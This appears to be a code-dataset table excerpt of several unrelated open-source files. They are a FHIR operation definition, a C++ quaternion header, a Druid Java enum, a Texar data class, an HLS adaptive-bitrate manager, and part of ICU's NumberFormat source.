max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
648 | <reponame>swrobel/fhir
{"resourceType":"OperationDefinition","id":"CapabilityStatement-versions","meta":{"lastUpdated":"2019-11-01T09:29:23.356+11:00"},"extension":[{"url":"http://hl7.org/fhir/StructureDefinition/structuredefinition-fmm","valueInteger":5},{"url":"http://hl7.org/fhir/StructureDefinition/structuredefinition-standards-status","valueCode":"trial-use"}],"url":"http://hl7.org/fhir/OperationDefinition/CapabilityStatement-versions","version":"4.0.1","name":"Discover what versions a server supports","status":"draft","kind":"operation","date":"2019-11-01T09:29:23+11:00","publisher":"HL7 (FHIR Project)","contact":[{"telecom":[{"system":"url","value":"http://hl7.org/fhir"},{"system":"email","value":"<EMAIL>"}]}],"description":"Using the [FHIR Version Mime Type Parameter](http.html#version-parameter), a server can support [multiple versions on the same end-point](versioning.html#mt-version). The only way for client to find out what versions a server supports in this fashion is the $versions operation. The client invokes the operation with no parameters. and the server returns the list of supported versions, along with the default version it will use if no fhirVersion parameter is present","code":"versions","resource":["CapabilityStatement"],"system":true,"type":false,"instance":false,"parameter":[{"name":"version","use":"out","min":1,"max":"*","documentation":"A version supported by the server. Use the major.minor version like 3.0","type":"code"},{"name":"default","use":"out","min":1,"max":"1","documentation":"The default version for the server. Use the major.minor version like 3.0","type":"code"}]} | 445 |
606 | <gh_stars>100-1000
/******************************************************************************
* Copyright 2017-2018 Baidu Robotic Vision Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#ifndef XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
#define XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
#include <Eigen/Core>
#include <Eigen/Geometry>
namespace XP {
class XpQuaternion : public Eigen::Vector4f {
// "Indirect Kalman Filter for 3D Attitude Estimation"
// x y z w
public:
// REQUIRED BY EIGEN
typedef Eigen::Vector4f Base;
// constructors
// XpQuaternion is Hamilton quaternion in the order of xyzw
// Eigen::Quaternion is also Hamiton quaternion in the order of wxyz
XpQuaternion();
template <typename Scalar>
XpQuaternion(Scalar q0, Scalar q1, Scalar q2, Scalar q3)
: Base{static_cast<float>(q0), static_cast<float>(q1),
static_cast<float>(q2), static_cast<float>(q3)} {
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
}
template <typename OtherDerived>
explicit XpQuaternion(
const Eigen::QuaternionBase<OtherDerived> &eigen_quat) {
SetFromEigenQuaternionf(eigen_quat);
}
// from MatrixBase - REQUIRED BY EIGEN
template <typename OtherDerived>
XpQuaternion(const MatrixBase<OtherDerived> &other) // NOLINT
: Base{other} {
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
}
// assignment operator - REQUIRED BY EIGEN
template <typename OtherDerived>
XpQuaternion &operator=(const MatrixBase<OtherDerived> &other) {
Base::operator=(other);
Eigen::Vector4f& q = *this;
q = q * (1.f / q.norm());
if (q(3) < 0) {
q = -q;
}
return *this;
}
inline float x() const { return (*this)[0]; }
inline float y() const { return (*this)[1]; }
inline float z() const { return (*this)[2]; }
inline float w() const { return (*this)[3]; }
// For more details on conversion to and from Hamiltonian quaternions
// see ref [2] and [3]
Eigen::Quaternionf ToEigenQuaternionf() const;
Eigen::Matrix3f ToRotationMatrix() const;
Eigen::Vector3f ToEulerRadians() const;
// set from Eigen Quaternion
template <typename OtherDerived>
void SetFromEigenQuaternionf(
const Eigen::QuaternionBase<OtherDerived> &eigen_quat) {
(*this)(0) = eigen_quat.x();
(*this)(1) = eigen_quat.y();
(*this)(2) = eigen_quat.z();
(*this)(3) = eigen_quat.w();
// keep scalar value non-negative
if ((*this)(3) < 0) {
(*this) = -(*this);
}
}
// set from RotationMatrix.
// http://www.euclideanspace.com/maths/geometry/rotations/conversions/
// matrixToQuaternion/
// Normalize the quaternion
void SetFromRotationMatrix(const Eigen::Matrix3f &R);
void SetFromEulerRadians(const Eigen::Vector3f& euler_rad);
// set from delta theta
// see page 8 on ref
// Not const & because dtheta is changed inside the function
void SetFromDeltaTheta(Eigen::Vector3f dtheta);
// v_lhs = R(q) * v_rhs
void SetFromTwoVectors(const Eigen::Vector3f& v_rhs, const Eigen::Vector3f& v_lhs);
// Hides Eigen::MatrixBase<>::inverse
XpQuaternion inverse() const;
XpQuaternion mul(const XpQuaternion& rhs) const;
};
inline Eigen::Matrix4f XpComposeOmega(const Eigen::Vector3f& w) {
Eigen::Matrix4f Ohm;
Ohm(0, 0) = 0; Ohm(0, 1) = -w(2); Ohm(0, 2) = w(1); Ohm(0, 3) = w(0);
Ohm(1, 0) = w(2); Ohm(1, 1) = 0; Ohm(1, 2) = -w(0); Ohm(1, 3) = w(1);
Ohm(2, 0) = -w(1); Ohm(2, 1) = w(0); Ohm(2, 2) = 0; Ohm(2, 3) = w(2);
Ohm(3, 0) = -w(0); Ohm(3, 1) = -w(1); Ohm(3, 2) = -w(2); Ohm(3, 3) = 0;
return Ohm;
}
// page 11
// Note we use Vector4f to represent quaternion instead of quaternion
// because it is better do not normalize q during integration
inline Eigen::Vector4f XpQuaternionDerivative(
const Eigen::Vector4f &q,
const Eigen::Vector3f &omega) {
return -0.5 * XpComposeOmega(omega) * q;
}
XpQuaternion quat_multiply(const XpQuaternion& lhs, const XpQuaternion& rhs);
// page 11
void IntegrateQuaternion(const Eigen::Vector3f &omega_begin,
const Eigen::Vector3f &omega_end,
const XpQuaternion &q_begin,
const float dt,
XpQuaternion *q_end,
XpQuaternion *q_mid = nullptr,
XpQuaternion *q_fourth = nullptr,
XpQuaternion *q_eighth = nullptr);
} // namespace XP
#endif // XP_INCLUDE_XP_MATH_XP_QUATERNION_H_
| 2,145 |
5,813 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexing.overlord;
/**
* This enum is used as a parameter for several methods in {@link IndexerMetadataStorageCoordinator}, specifying whether
* only visible segments, or visible as well as overshadowed segments should be included in results.
*
* Visibility (and overshadowness - these terms are antonyms) may be defined on an interval (or a series of intervals).
* Consider the following example:
*
* |----| I
* |----| S'
* |-------| S
*
* Here, I denotes an interval in question, S and S' are segments. S' is newer (has a higher version) than S.
* Segment S is overshadowed (by S') on the interval I, though it's visible (non-overshadowed) outside of I: more
* specifically, it's visible on the interval [end of S', end of S].
*
* A segment is considered visible on a series of intervals if it's visible on any of the intervals in the series. A
* segment is considered (fully) overshadowed on a series of intervals if it's overshadowed (= non-visible) on all of
* the intervals in the series.
*
* If not specified otherwise, visibility (or overshadowness) should be assumed on the interval (-inf, +inf).
*/
public enum Segments
{
/** Specifies that only visible segments should be included in results. */
ONLY_VISIBLE,
/** Specifies that visible as well as overshadowed segments should be included in results. */
INCLUDING_OVERSHADOWED
}
| 570 |
448 | #include "hls_adaptive_manager.h"
#include "general.h"
#ifdef __APPLE__
#include <ifaddrs.h>
#include <arpa/inet.h>
#include <net/if.h>
#else
#include "TrafficStats.h"
#endif
#define LOWER_SWITCH_VALUE (10*1000*1000)
#define UPPER_SWITCH_VALUE (30*1000*1000)
#include <utils/frame_work_log.h>
namespace Cicada {
AdaptiveBitrateManager::AdaptiveBitrateManager()
{
mBufferService = nullptr;
}
AdaptiveBitrateManager::~AdaptiveBitrateManager()
{
}
void AdaptiveBitrateManager::SetCurrentBitrate(int bitrate)
{
mCurrentBitrate = bitrate;
}
void AdaptiveBitrateManager::SetBufferControlPtr(BufferController *bufferService)
{
mBufferService = bufferService;
}
void AdaptiveBitrateManager::clear()
{
mLastDownloadBytes = 0;
mMaxDownloadSpeed = 0;
mSpanDownloadSpeed = 0;
mLastSpanDownloadSpeed = 0;
mStreamIndexBitrateMap.clear();
mCurrentBitrate = 0;
mStartTime = INT64_MIN;
mLastSwitchTime = INT64_MIN;
mLastVideoDuration = INT64_MIN;
memset(mDurationStatics, 0, 10 * sizeof(int));
mDurationCount = 0;
mBitrates.clear();
}
int64_t AdaptiveBitrateManager::getInterfaceBytes()
{
#ifdef __APPLE__
struct ifaddrs *ifa_list = 0, *ifa;
if (getifaddrs(&ifa_list) == -1) {
return 0;
}
uint32_t iBytes = 0;
uint32_t oBytes = 0;
for (ifa = ifa_list; ifa; ifa = ifa->ifa_next) {
if (AF_LINK != ifa->ifa_addr->sa_family) {
continue;
}
if (!(ifa->ifa_flags & IFF_UP) && !(ifa->ifa_flags & IFF_RUNNING)) {
continue;
}
if (ifa->ifa_data == 0) {
continue;
}
/* Not a loopback device. */
if (strncmp(ifa->ifa_name, "lo", 2)) {
struct if_data *if_data = (struct if_data *) ifa->ifa_data;
iBytes += if_data->ifi_ibytes;
oBytes += if_data->ifi_obytes;
}
}
freeifaddrs(ifa_list);
return iBytes;
#else
//TODO: android get bytes
#ifndef WIN32
uint64_t byteNums = getIfaceStatType(NULL, IfaceStatType::RX_BYTES);
AF_LOGD("android get bytes .. %lld", byteNums);
return byteNums;
#endif
#endif
return 0;
}
void AdaptiveBitrateManager::reset()
{
memset(mDurationStatics, 0, 10 * sizeof(int));
mDurationCount = 0;
mLastVideoDuration = INT64_MIN;
}
void AdaptiveBitrateManager::AddStreamInfo(int streamIndex, int bitrate)
{
mStreamIndexBitrateMap.insert(pair<int, int>(bitrate, streamIndex));
mBitrates.push_back(bitrate);
sort(mBitrates.begin(), mBitrates.end(), std::less<int>());
}
void AdaptiveBitrateManager::SetCallback(streamAdaptChanged callback, void *userData)
{
mCallback = callback;
mUserData = userData;
}
void AdaptiveBitrateManager::setCanSwitch(bool canSwitch)
{
mCanSwitch = canSwitch;
reset();
}
void AdaptiveBitrateManager::ProcessSwitchStream(int64_t curTime)
{
if (mBufferService == nullptr) {
return;
}
if (!mCanSwitch) {
return;
}
int64_t duration = mBufferService->GetPacketDuration(BUFFER_TYPE_VIDEO);
if (duration > mLastVideoDuration) {
mDurationStatics[mDurationCount++] = 1;
} else {
mDurationStatics[mDurationCount++] = -1;
}
mDurationCount = mDurationCount % 10;
mLastVideoDuration = duration;
if (mLastSwitchTime != INT64_MIN && curTime - mLastSwitchTime < 10 * 1000) {
return;
}
int totalUp = 0;
for (int i = 0; i < 10; i++) {
totalUp += mDurationStatics[i];
}
AF_LOGD("mDurationStatics is %d,duration is %lld,last duration is %lld", totalUp, duration, mLastVideoDuration);
if ((duration < LOWER_SWITCH_VALUE && totalUp <= -8)) {
int count = (int) mBitrates.size();
if (count != 0) {
int bitrate = -1;
for (int i = count - 1; i >= 0; i--) {
if (mBitrates[i] <= mLastSpanDownloadSpeed) {
bitrate = mBitrates[i];
break;
}
}
if (bitrate == -1) {
bitrate = mBitrates[0];
}
if (mCurrentBitrate != bitrate) {
mCurrentBitrate = bitrate;
if (mCallback) {
map<int, int>::iterator iter = mStreamIndexBitrateMap.find(mCurrentBitrate);
if (iter != mStreamIndexBitrateMap.end()) {
int index = iter->second;
mCallback(index, mUserData);
mCanSwitch = false;
mLastSwitchTime = curTime;
}
}
}
}
} else if (duration >= UPPER_SWITCH_VALUE && totalUp >= 8) {
int bitrate = -1;
int currentIndex = -1;
int count = (int) mBitrates.size();
for (int i = 0; i < count; i++) {
if (mBitrates[i] == mCurrentBitrate) {
currentIndex = i;
break;
}
}
if (currentIndex == count - 1) {
return;
}
if (mLastSpanDownloadSpeed > mBitrates[currentIndex + 1]) {
for (int i = currentIndex + 2; i < count; i++) {
if (mLastSpanDownloadSpeed <= mBitrates[i]) {
currentIndex = i;
bitrate = mBitrates[i];
break;
}
}
} else {
bitrate = mBitrates[currentIndex + 1];
}
if (bitrate != -1 && mCurrentBitrate != bitrate) {
mCurrentBitrate = bitrate;
if (mCallback) {
map<int, int>::iterator iter = mStreamIndexBitrateMap.find(mCurrentBitrate);
if (iter != mStreamIndexBitrateMap.end()) {
int index = iter->second;
mCallback(index, mUserData);
mCanSwitch = false;
mLastSwitchTime = curTime;
}
}
}
}
}
void AdaptiveBitrateManager::OnSecondTimer(int64_t curTime)
{
if (mStartTime == INT64_MIN) {
mStartTime = curTime;
mLastSwitchTime = curTime;
}
if (mLastDownloadBytes == 0) {
mLastDownloadBytes = getInterfaceBytes();
} else {
int64_t downloadBytes = getInterfaceBytes() - mLastDownloadBytes;
int downloadSpeed = (int) downloadBytes / (1024);
if (mMaxDownloadSpeed < downloadSpeed) {
mMaxDownloadSpeed = downloadSpeed;
}
if (mSpanDownloadSpeed < downloadSpeed) {
mSpanDownloadSpeed = downloadSpeed;
}
if (curTime - mStartTime > mUpdateSpan) {
mLastSpanDownloadSpeed = mSpanDownloadSpeed;
mSpanDownloadSpeed = 0;
mStartTime = curTime;
}
AF_LOGD("download speed is %d,download speed is %d", mMaxDownloadSpeed, downloadSpeed);
mLastDownloadBytes = getInterfaceBytes();
ProcessSwitchStream(curTime);
}
}
}//namespace Cicada
| 4,095 |
1,609 | <filename>src/main/java/com/mossle/humantask/engine/HumanTask.java
package com.mossle.humantask.engine;
public class HumanTask {
}
| 49 |
2,325 | <reponame>dyoshioka-555/texar
# Copyright 2018 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Base data class that is enherited by all data classes.
A data defines data reading, parsing, batching, and other
preprocessing operations.
"""
import tensorflow as tf
from texar.tf.hyperparams import HParams
from texar.tf.data.data import dataset_utils as dsutils
from texar.tf.data.data_utils import count_file_lines
__all__ = [
"DataBase"
]
class DataBase(object):
"""Base class inheritted by all data classes.
"""
def __init__(self, hparams):
self._hparams = HParams(hparams, self.default_hparams())
@staticmethod
def default_hparams():
"""Returns a dictionary of default hyperparameters.
.. code-block:: python
{
"num_epochs": 1,
"batch_size": 64,
"allow_smaller_final_batch": True,
"shuffle": True,
"shuffle_buffer_size": None,
"shard_and_shuffle": False,
"num_parallel_calls": 1,
"prefetch_buffer_size": 0,
"max_dataset_size": -1,
"seed": None,
"name": "data",
}
Here:
"num_epochs": int
Number of times the dataset should be repeated. An
:tf_main:`OutOfRangeError <errors/OutOfRangeError>` signal will
be raised after the whole repeated dataset has been iterated
through.
E.g., For training data, set it to 1 (default) so that you
will get the signal after each epoch of training. Set to -1
to repeat the dataset indefinitely.
"batch_size": int
Batch size, i.e., the number of consecutive elements of the
dataset to combine in a single batch.
"allow_smaller_final_batch": bool
Whether to allow the final batch to be smaller if there are
insufficient elements left. If `False`, the final batch is
discarded if it is smaller than batch size. Note that,
if `True`, `output_shapes` of the resulting dataset
will have a a **static** batch_size dimension equal to
"batch_size".
"shuffle": bool
Whether to randomly shuffle the elements of the dataset.
"shuffle_buffer_size": int
The buffer size for data shuffling. The larger, the better
the resulting data is mixed.
If `None` (default), buffer size is set to the size of the
whole dataset (i.e., make the shuffling the maximally
effective).
"shard_and_shuffle": bool
Whether to first shard the dataset and then shuffle each
block respectively. Useful when the whole data is too large to
be loaded efficiently into the memory.
If `True`, :attr:`shuffle_buffer_size` must be specified to
determine the size of each shard.
"num_parallel_calls": int
Number of elements from the datasets to process in parallel.
"prefetch_buffer_size": int
The maximum number of elements that will be buffered when
prefetching.
max_dataset_size : int
Maximum number of instances to include in
the dataset. If set to `-1` or greater than the size of
dataset, all instances will be included. This constraint is
imposed after data shuffling and filtering.
seed : int, optional
The random seed for shuffle.
Note that if a seed is set, the shuffle order will be exact
the same every time when going through the (repeated) dataset.
For example, consider a dataset with elements [1, 2, 3], with
"num_epochs"`=2` and some fixed seed, the resulting sequence
can be: 2 1 3, 1 3 2 | 2 1 3, 1 3 2, ... That is, the orders are
different **within** every `num_epochs`, but are the same
**across** the `num_epochs`.
name : str
Name of the data.
"""
return {
"name": "data",
"num_epochs": 1,
"batch_size": 64,
"allow_smaller_final_batch": True,
"shuffle": True,
"shuffle_buffer_size": None,
"shard_and_shuffle": False,
"num_parallel_calls": 1,
"prefetch_buffer_size": 0,
"max_dataset_size": -1,
"seed": None
}
@staticmethod
def _make_batch(dataset, hparams, padded_batch=False, padding_values=None):
dataset = dataset.repeat(hparams.num_epochs)
batch_size = hparams["batch_size"]
if hparams["allow_smaller_final_batch"]:
if padded_batch:
dataset = dataset.padded_batch(
batch_size, dataset.output_shapes,
padding_values=padding_values)
else:
dataset = dataset.batch(batch_size)
else:
dataset = dataset.apply(
tf.contrib.data.padded_batch_and_drop_remainder(
batch_size, dataset.output_shapes,
padding_values=padding_values))
return dataset
@staticmethod
def _shuffle_dataset(dataset, hparams, dataset_files):
dataset_size = None
shuffle_buffer_size = hparams["shuffle_buffer_size"]
if hparams["shard_and_shuffle"]:
if shuffle_buffer_size is None:
raise ValueError(
"Dataset hyperparameter 'shuffle_buffer_size' "
"must not be `None` if 'shard_and_shuffle'=`True`.")
dataset_size = count_file_lines(dataset_files)
if shuffle_buffer_size >= dataset_size:
raise ValueError(
"Dataset size (%d) <= shuffle_buffer_size (%d). Set "
"shuffle_and_shard to `False`." %
(dataset_size, shuffle_buffer_size))
# TODO(zhiting): Use a different seed?
dataset = dataset.apply(dsutils.random_shard_dataset(
dataset_size, shuffle_buffer_size, hparams["seed"]))
dataset = dataset.shuffle(shuffle_buffer_size + 16, # add a margin
seed=hparams["seed"])
elif hparams["shuffle"]:
if shuffle_buffer_size is None:
dataset_size = count_file_lines(dataset_files)
shuffle_buffer_size = dataset_size
dataset = dataset.shuffle(shuffle_buffer_size, seed=hparams["seed"])
return dataset, dataset_size
@property
def num_epochs(self):
"""Number of epochs.
"""
return self._hparams.num_epochs
@property
def batch_size(self):
"""The batch size.
"""
return self._hparams.batch_size
@property
def hparams(self):
"""A :class:`~texar.tf.HParams` instance of the
data hyperparameters.
"""
return self._hparams
@property
def name(self):
"""Name of the module.
"""
return self._hparams.name
| 3,656 |
4,879 | <reponame>EdwardPrentice/wrongo
/*
*******************************************************************************
* Copyright (C) 1997-2015, International Business Machines Corporation and
* others. All Rights Reserved.
*******************************************************************************
*
* File NUMFMT.CPP
*
* Modification History:
*
* Date Name Description
* 02/19/97 aliu Converted from java.
* 03/18/97 clhuang Implemented with C++ APIs.
* 04/17/97 aliu Enlarged MAX_INTEGER_DIGITS to fully accomodate the
* largest double, by default.
* Changed DigitCount to int per code review.
* 07/20/98 stephen Changed operator== to check for grouping
* Changed setMaxIntegerDigits per Java implementation.
* Changed setMinIntegerDigits per Java implementation.
* Changed setMinFractionDigits per Java implementation.
* Changed setMaxFractionDigits per Java implementation.
********************************************************************************
*/
#include "unicode/utypes.h"
#if !UCONFIG_NO_FORMATTING
#include "unicode/numfmt.h"
#include "unicode/locid.h"
#include "unicode/dcfmtsym.h"
#include "unicode/decimfmt.h"
#include "unicode/ustring.h"
#include "unicode/ucurr.h"
#include "unicode/curramt.h"
#include "unicode/numsys.h"
#include "unicode/rbnf.h"
#include "unicode/localpointer.h"
#include "unicode/udisplaycontext.h"
#include "charstr.h"
#include "winnmfmt.h"
#include "uresimp.h"
#include "uhash.h"
#include "cmemory.h"
#include "servloc.h"
#include "ucln_in.h"
#include "cstring.h"
#include "putilimp.h"
#include "uassert.h"
#include "umutex.h"
#include "mutex.h"
#include "digitlst.h"
#include <float.h>
#include "sharednumberformat.h"
#include "unifiedcache.h"
//#define FMT_DEBUG
#ifdef FMT_DEBUG
#include <stdio.h>
static inline void debugout(UnicodeString s) {
char buf[2000];
s.extract((int32_t) 0, s.length(), buf);
printf("%s", buf);
}
#define debug(x) printf("%s", x);
#else
#define debugout(x)
#define debug(x)
#endif
// If no number pattern can be located for a locale, this is the last
// resort. The patterns are same as the ones in root locale.
static const UChar gLastResortDecimalPat[] = {
0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x23, 0x23, 0x23, 0 /* "#,##0.###" */
};
static const UChar gLastResortCurrencyPat[] = {
0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A0#,##0.00" */
};
static const UChar gLastResortPercentPat[] = {
0x23, 0x2C, 0x23, 0x23, 0x30, 0x25, 0 /* "#,##0%" */
};
static const UChar gLastResortScientificPat[] = {
0x23, 0x45, 0x30, 0 /* "#E0" */
};
static const UChar gLastResortIsoCurrencyPat[] = {
0xA4, 0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A4\u00A0#,##0.00" */
};
static const UChar gLastResortPluralCurrencyPat[] = {
0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x23, 0x23, 0x23, 0x20, 0xA4, 0xA4, 0xA4, 0 /* "#,##0.### \u00A4\u00A4\u00A4*/
};
static const UChar gLastResortAccountingCurrencyPat[] = {
0xA4, 0xA0, 0x23, 0x2C, 0x23, 0x23, 0x30, 0x2E, 0x30, 0x30, 0 /* "\u00A4\u00A0#,##0.00" */
};
static const UChar gSingleCurrencySign[] = {0xA4, 0};
static const UChar gDoubleCurrencySign[] = {0xA4, 0xA4, 0};
static const UChar gSlash = 0x2f;
// If the maximum base 10 exponent were 4, then the largest number would
// be 99,999 which has 5 digits.
// On IEEE754 systems gMaxIntegerDigits is 308 + possible denormalized 15 digits + rounding digit
// With big decimal, the max exponent is 999,999,999 and the max number of digits is the same, 999,999,999
const int32_t icu::NumberFormat::gDefaultMaxIntegerDigits = 2000000000;
const int32_t icu::NumberFormat::gDefaultMinIntegerDigits = 127;
static const UChar * const gLastResortNumberPatterns[UNUM_FORMAT_STYLE_COUNT] = {
NULL, // UNUM_PATTERN_DECIMAL
gLastResortDecimalPat, // UNUM_DECIMAL
gLastResortCurrencyPat, // UNUM_CURRENCY
gLastResortPercentPat, // UNUM_PERCENT
gLastResortScientificPat, // UNUM_SCIENTIFIC
NULL, // UNUM_SPELLOUT
NULL, // UNUM_ORDINAL
NULL, // UNUM_DURATION
NULL, // UNUM_NUMBERING_SYSTEM
NULL, // UNUM_PATTERN_RULEBASED
gLastResortIsoCurrencyPat, // UNUM_CURRENCY_ISO
gLastResortPluralCurrencyPat, // UNUM_CURRENCY_PLURAL
gLastResortAccountingCurrencyPat, // UNUM_CURRENCY_ACCOUNTING
gLastResortCurrencyPat, // UNUM_CASH_CURRENCY
NULL, // UNUM_DECIMAL_COMPACT_SHORT
NULL, // UNUM_DECIMAL_COMPACT_LONG
gLastResortCurrencyPat, // UNUM_CURRENCY_STANDARD
};
// Keys used for accessing resource bundles
static const char *gNumberElements = "NumberElements";
static const char *gLatn = "latn";
static const char *gPatterns = "patterns";
static const char *gFormatKeys[UNUM_FORMAT_STYLE_COUNT] = {
NULL, // UNUM_PATTERN_DECIMAL
"decimalFormat", // UNUM_DECIMAL
"currencyFormat", // UNUM_CURRENCY
"percentFormat", // UNUM_PERCENT
"scientificFormat", // UNUM_SCIENTIFIC
NULL, // UNUM_SPELLOUT
NULL, // UNUM_ORDINAL
NULL, // UNUM_DURATION
NULL, // UNUM_NUMBERING_SYSTEM
NULL, // UNUM_PATTERN_RULEBASED
// For UNUM_CURRENCY_ISO and UNUM_CURRENCY_PLURAL,
// the pattern is the same as the pattern of UNUM_CURRENCY
// except for replacing the single currency sign with
// double currency sign or triple currency sign.
"currencyFormat", // UNUM_CURRENCY_ISO
"currencyFormat", // UNUM_CURRENCY_PLURAL
"accountingFormat", // UNUM_CURRENCY_ACCOUNTING
"currencyFormat", // UNUM_CASH_CURRENCY
NULL, // UNUM_DECIMAL_COMPACT_SHORT
NULL, // UNUM_DECIMAL_COMPACT_LONG
"currencyFormat", // UNUM_CURRENCY_STANDARD
};
// Static hashtable cache of NumberingSystem objects used by NumberFormat
static UHashtable * NumberingSystem_cache = NULL;
static UMutex nscacheMutex = U_MUTEX_INITIALIZER;
static icu::UInitOnce gNSCacheInitOnce = U_INITONCE_INITIALIZER;
#if !UCONFIG_NO_SERVICE
static icu::ICULocaleService* gService = NULL;
static icu::UInitOnce gServiceInitOnce = U_INITONCE_INITIALIZER;
#endif
/**
* Release all static memory held by Number Format.
*/
U_CDECL_BEGIN
static void U_CALLCONV
deleteNumberingSystem(void *obj) {
delete (icu::NumberingSystem *)obj;
}
static UBool U_CALLCONV numfmt_cleanup(void) {
#if !UCONFIG_NO_SERVICE
gServiceInitOnce.reset();
if (gService) {
delete gService;
gService = NULL;
}
#endif
gNSCacheInitOnce.reset();
if (NumberingSystem_cache) {
// delete NumberingSystem_cache;
uhash_close(NumberingSystem_cache);
NumberingSystem_cache = NULL;
}
return TRUE;
}
U_CDECL_END
// *****************************************************************************
// class NumberFormat
// *****************************************************************************
U_NAMESPACE_BEGIN
UOBJECT_DEFINE_ABSTRACT_RTTI_IMPLEMENTATION(NumberFormat)
#if !UCONFIG_NO_SERVICE
// -------------------------------------
// SimpleNumberFormatFactory implementation
NumberFormatFactory::~NumberFormatFactory() {}
SimpleNumberFormatFactory::SimpleNumberFormatFactory(const Locale& locale, UBool visible)
: _visible(visible)
{
LocaleUtility::initNameFromLocale(locale, _id);
}
SimpleNumberFormatFactory::~SimpleNumberFormatFactory() {}
UBool SimpleNumberFormatFactory::visible(void) const {
return _visible;
}
const UnicodeString *
SimpleNumberFormatFactory::getSupportedIDs(int32_t &count, UErrorCode& status) const
{
if (U_SUCCESS(status)) {
count = 1;
return &_id;
}
count = 0;
return NULL;
}
#endif /* #if !UCONFIG_NO_SERVICE */
// -------------------------------------
// default constructor
NumberFormat::NumberFormat()
: fGroupingUsed(TRUE),
fMaxIntegerDigits(gDefaultMaxIntegerDigits),
fMinIntegerDigits(1),
fMaxFractionDigits(3), // invariant, >= minFractionDigits
fMinFractionDigits(0),
fParseIntegerOnly(FALSE),
fLenient(FALSE),
fCapitalizationContext(UDISPCTX_CAPITALIZATION_NONE)
{
fCurrency[0] = 0;
}
// -------------------------------------
NumberFormat::~NumberFormat()
{
}
SharedNumberFormat::~SharedNumberFormat() {
delete ptr;
}
// -------------------------------------
// copy constructor
NumberFormat::NumberFormat(const NumberFormat &source)
: Format(source)
{
*this = source;
}
// -------------------------------------
// assignment operator
NumberFormat&
NumberFormat::operator=(const NumberFormat& rhs)
{
if (this != &rhs)
{
Format::operator=(rhs);
fGroupingUsed = rhs.fGroupingUsed;
fMaxIntegerDigits = rhs.fMaxIntegerDigits;
fMinIntegerDigits = rhs.fMinIntegerDigits;
fMaxFractionDigits = rhs.fMaxFractionDigits;
fMinFractionDigits = rhs.fMinFractionDigits;
fParseIntegerOnly = rhs.fParseIntegerOnly;
u_strncpy(fCurrency, rhs.fCurrency, 3);
fCurrency[3] = 0;
fLenient = rhs.fLenient;
fCapitalizationContext = rhs.fCapitalizationContext;
}
return *this;
}
// -------------------------------------
UBool
NumberFormat::operator==(const Format& that) const
{
// Format::operator== guarantees this cast is safe
NumberFormat* other = (NumberFormat*)&that;
#ifdef FMT_DEBUG
// This code makes it easy to determine why two format objects that should
// be equal aren't.
UBool first = TRUE;
if (!Format::operator==(that)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("Format::!=");
}
if (!(fMaxIntegerDigits == other->fMaxIntegerDigits &&
fMinIntegerDigits == other->fMinIntegerDigits)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("Integer digits !=");
}
if (!(fMaxFractionDigits == other->fMaxFractionDigits &&
fMinFractionDigits == other->fMinFractionDigits)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("Fraction digits !=");
}
if (!(fGroupingUsed == other->fGroupingUsed)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("fGroupingUsed != ");
}
if (!(fParseIntegerOnly == other->fParseIntegerOnly)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("fParseIntegerOnly != ");
}
if (!(u_strcmp(fCurrency, other->fCurrency) == 0)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("fCurrency !=");
}
if (!(fLenient == other->fLenient)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("fLenient != ");
}
if (!(fCapitalizationContext == other->fCapitalizationContext)) {
if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
debug("fCapitalizationContext != ");
}
if (!first) { printf(" ]"); }
#endif
return ((this == &that) ||
((Format::operator==(that) &&
fMaxIntegerDigits == other->fMaxIntegerDigits &&
fMinIntegerDigits == other->fMinIntegerDigits &&
fMaxFractionDigits == other->fMaxFractionDigits &&
fMinFractionDigits == other->fMinFractionDigits &&
fGroupingUsed == other->fGroupingUsed &&
fParseIntegerOnly == other->fParseIntegerOnly &&
u_strcmp(fCurrency, other->fCurrency) == 0 &&
fLenient == other->fLenient &&
fCapitalizationContext == other->fCapitalizationContext)));
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
UnicodeString&
